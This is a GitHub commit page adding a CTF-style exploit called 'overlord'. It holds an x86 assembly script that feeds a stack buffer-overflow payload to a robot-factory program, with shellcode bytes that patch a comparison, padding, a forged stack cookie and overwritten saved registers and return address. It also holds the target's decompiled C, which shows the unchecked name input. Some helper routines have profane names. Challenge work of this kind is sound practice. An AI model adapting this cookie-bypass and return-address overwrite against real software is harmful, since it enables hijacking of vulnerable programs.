Permalink
Browse files

Add overlord

  • Loading branch information...
rollsafe committed Nov 19, 2018
1 parent c52c95a commit a3e4ac800fe9ffe2402c7726b3b9dd52f7bfc728
@@ -0,0 +1,119 @@
main:
pause
mov al, 0x61
out 0, al
pause
pause
pause

mov al, 0x31
out 0, al
pause
pause
pause

; 0: 33 c0 xor eax,eax
; 2: 66 b8 d7 8d mov ax,0x8dd7 --- 'p' in cmp al, 'p' @ 103a
; 6: fe 40 01 inc BYTE PTR [eax+0x1]
; 9: 66 b8 a6 8d mov ax,0x8da6
; d: ff d0 call eax

push 0xb866c033
call cunt
push 0x40fe8dd7
call cunt
push 0xa6b86601
call cunt
push 0x00d0ff8d
call cunt

push 0x41 ; pad
push 16
call bitch

push 0x2C1633DC ; function cookie ^ ret addr
call cunt

push 0x00008000 ; esi
call cunt
push 0x00008000 ; ebp
call cunt

push 0x00008000 ; return addr
call cunt

push 0x00008000 ; strcpy overwrite dest
call cunt

mov al, 0xa
out 0, al

mov al, 0x41
out 1, al
hlt;

cunt: ; __stdcall cunt(int x)
push ebp
mov ebp, esp
mov eax, [ebp+8]
out 0, al
shr eax, 8
out 0, al
shr eax, 8
out 0, al
shr eax, 8
out 0, al
leave
ret 4

bitch: ; __stdcall bitch(int n, int val)
push ebp
mov ebp, esp
mov eax, [ebp+12] ; val
mov edx, [ebp+8] ; n
l:
test edx, edx
jz fin
out 0, al
dec edx
jmp l
fin:
leave
ret 8

bitch2: ; __cdecl bitch2(int n)
push ebp
mov ebp, esp
mov edx, [ebp+8] ; n
l2:
test edx, edx
jz fin2
in al, 1
out 1, al
dec edx
jmp l2
fin2:
leave
ret

p: ; __cdecl p(char c)
push ebp
mov ebp, esp
mov eax, [ebp+8]
mov ecx, eax
and al, 0xf0
shr eax, 4
and cl, 0x0f
add al, 0x61
add cl, 0x61
out 1, al
mov al, cl
out 1, al
mov al, 0x20
out 1, al
leave
ret

.data
cookie:
db 0, 0, 0, 0
@@ -0,0 +1,104 @@
// write access to const memory has been detected, the output may be wrong!
int __cdecl __noreturn main(int argc, const char **argv, const char **envp)
{
unsigned __int8 v3; // al
unsigned __int8 v4; // al
unsigned __int8 *v5; // ecx
unsigned __int8 v6; // al
int v7; // ecx
unsigned int v8; // eax
int v9; // ecx
unsigned __int8 *v10; // esi
unsigned __int8 v11; // al
unsigned __int8 v12; // al
int v13; // esi
unsigned __int8 v14; // al
unsigned __int8 v15; // al
int v16; // [esp-24h] [ebp-2Ch]
unsigned int v17; // [esp-4h] [ebp-Ch]
unsigned int retaddr; // [esp+8h] [ebp+0h]

v17 = retaddr ^ _cookie;
while ( 1 )
{
puts(&_base);
do
{
v3 = __inbyte(0);
if ( v3 == 'r' || v3 == 'R' )
{
is_random = 1;
puts("\\nCreating random robots");
goto main_select_quantity;
}
}
while ( v3 < 'a' || v3 > 'p' );
is_random = 0;
robot_type = v3 - 'a';
puts("\\nCreating ");
puts(&factory_item_table[*(_DWORD *)&factory_item_table[4 * (unsigned __int8)robot_type]]);
main_select_quantity:
puts("\\n\\nQuantity (1-8):\\n");
do
{
do
v4 = __inbyte(0);
while ( v4 < 0x31u );
}
while ( v4 > 0x38u );
robot_quantity = v4 - 48;
puts("\\nQA employee name:\\n");
input((int)&v16);
__outbyte(3u, robot_type);
__outbyte(3u, robot_quantity);
v5 = (unsigned __int8 *)&v16;
do
{
v6 = *v5;
__outbyte(3u, *v5++);
}
while ( v6 );
if ( is_random )
{
v8 = rand();
v9 = 0;
do
{
robot_array[v9] = v8 & 0xF;
v8 >>= 4;
++v9;
}
while ( (unsigned __int8)v9 < (unsigned __int8)robot_quantity );
robot_array[v9] = -1;
}
else
{
v7 = 0;
do
robot_array[v7++] = robot_type;
while ( (unsigned __int8)v7 < (unsigned __int8)robot_quantity );
robot_array[v7] = -1;
}
v10 = (unsigned __int8 *)robot_array;
do
{
v11 = *v10;
__outbyte(2u, *v10++);
}
while ( v11 != -1 );
do
{
puts("\\fWaiting for factory output to reach\\ninspection station...");
v12 = __inbyte(2u);
v13 = v12;
puts(
"\\fFactory output has reached the\\ninspection station.\\n\\nPlease inspect the factory output\\nfor flaws. If y"
"ou see any, please\\nlog the issue in the logbook along\\nwith the serial number.\\n\\nPress any key once complete.\\n");
v14 = __inbyte(0);
__outbyte(2u, 0xFFu);
}
while ( v13 );
puts("\\fProduction is complete. Waiting for\\nthe factory output to proceed into the\\nstorage area...");
v15 = __inbyte(2u);
}
}
Oops, something went wrong.

0 comments on commit a3e4ac8

Please sign in to comment.